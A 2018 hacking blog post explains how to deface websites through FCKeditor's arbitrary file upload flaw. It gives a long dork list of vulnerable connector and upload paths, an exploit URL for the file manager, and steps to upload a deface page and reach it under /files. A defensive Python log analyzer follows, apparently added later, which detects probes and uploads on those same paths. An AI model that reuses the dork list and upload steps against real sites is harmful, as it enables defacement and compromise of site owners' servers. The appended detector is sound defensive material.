Friday, 14 December 2018

Defacement: The FCKeditor Method

Defacement using the FCKeditor method



Author : Mr.Rvms
Blogspot : https://bl4ckh4mm3r.blogspot.com/
Vulnerability Style : File Upload
Bug : File Upload


( Dork ) :

/assets/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/admin/fckeditor/editor/filemanager/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/connectors/php/upload.php
/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
/admin/fckeditor/editor/filemanager/upload/php/upload.php
/includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
/includes/fckeditor/editor/filemanager/connectors/asp/upload.asp 
/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/includes/fckeditor/editor/filemanager/connectors/php/connector.php 
/includes/fckeditor/editor/filemanager/connectors/php/upload.php 
/includes/fckeditor/editor/filemanager/upload/asp/upload.asp 
/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx 
/includes/fckeditor/editor/filemanager/upload/php/upload.php
/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/fckeditor/editor/filemanager/connectors/asp/upload.asp
/fckeditor/editor/filemanager/connectors/php/upload.php
/fckeditor/editor/filemanager/upload/aspx/upload.aspx
/fckeditor/editor/filemanager/upload/asp/upload.asp
/fckeditor/editor/filemanager/upload/php/upload.php
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php
/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/ckeditor/ckfinder/core/connector/asp/connector.asp
/ckeditor/ckfinder/core/connector/php/connector.php
/ckeditor/ckfinder/core/connector/aspx/connector.aspx 

Exploit FCKeditor Arbitrary File Upload :

http://target.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Upload your deface script.

The result of the deface will be at:

www.target.com/files ( if you renamed your deface script to index.html )
www.target.com/files/namascriptlu.html ( if you renamed your deface script to anything you like, for example tai.html )

Not clear? Contact me here.
That's all, and thank you ^_^
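For site owners, the sequence described above (a request to the file manager, an upload, then a fetch from /files) can be spotted in web server access logs. The following is an added example, not code from this post or from FCKeditor; it assumes Combined Log Format and the /files upload directory named above, and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Path fragments taken from the list in this post: FCKeditor file manager
# connectors, upload handlers and browser pages, plus the CKFinder connector.
EDITOR_PATH = re.compile(
    r"/(?:fckeditor/editor/filemanager/(?:connectors|upload|browser)/"
    r"|ckfinder/core/connector/)", re.IGNORECASE)
# Assumed Combined Log Format: ip ident user [time] "METHOD path proto" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

def analyze(lines, upload_dir="/files"):
    """Group editor probes, accepted POSTs and later read-backs by client IP."""
    report = defaultdict(lambda: {"probes": [], "uploads": [], "fetched": []})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the assumed format
        ip, method, path, status = m[1], m[2], m[3].split("?")[0], int(m[4])
        if EDITOR_PATH.search(path):
            # A POST the server did not reject is treated as a possible upload.
            kind = "uploads" if method == "POST" and status < 400 else "probes"
            report[ip][kind].append(path)
        elif (ip in report and report[ip]["uploads"] and status == 200
              and (path + "/").startswith(upload_dir + "/")):
            # Same client reading from the upload directory after its POST.
            report[ip]["fetched"].append(path)
    return dict(report)

# Constructed sample log lines (documentation IP ranges, not real traffic).
FM = "/admin/FCKeditor/editor/filemanager/browser/default/"
SAMPLE = [
    f'203.0.113.7 - - [14/Dec/2018:10:00:01 +0700] "GET {FM}browser.html'
    '?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 2310',
    f'203.0.113.7 - - [14/Dec/2018:10:00:09 +0700] "POST {FM}connectors/php/'
    'connector.php HTTP/1.1" 200 187',
    '203.0.113.7 - - [14/Dec/2018:10:00:15 +0700] "GET /files/tai.html HTTP/1.1" 200 512',
    '198.51.100.20 - - [14/Dec/2018:10:01:00 +0700] "GET /files/report.pdf HTTP/1.1" 200 90',
    '198.51.100.9 - - [14/Dec/2018:10:02:00 +0700] "GET /includes/fckeditor/editor/'
    'filemanager/upload/php/upload.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE).items():
        print(ip, hits)
```

A client that appears with both `uploads` and `fetched` entries is the one to investigate first; clients with only `probes` were looking for the connector but did not get a POST accepted.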





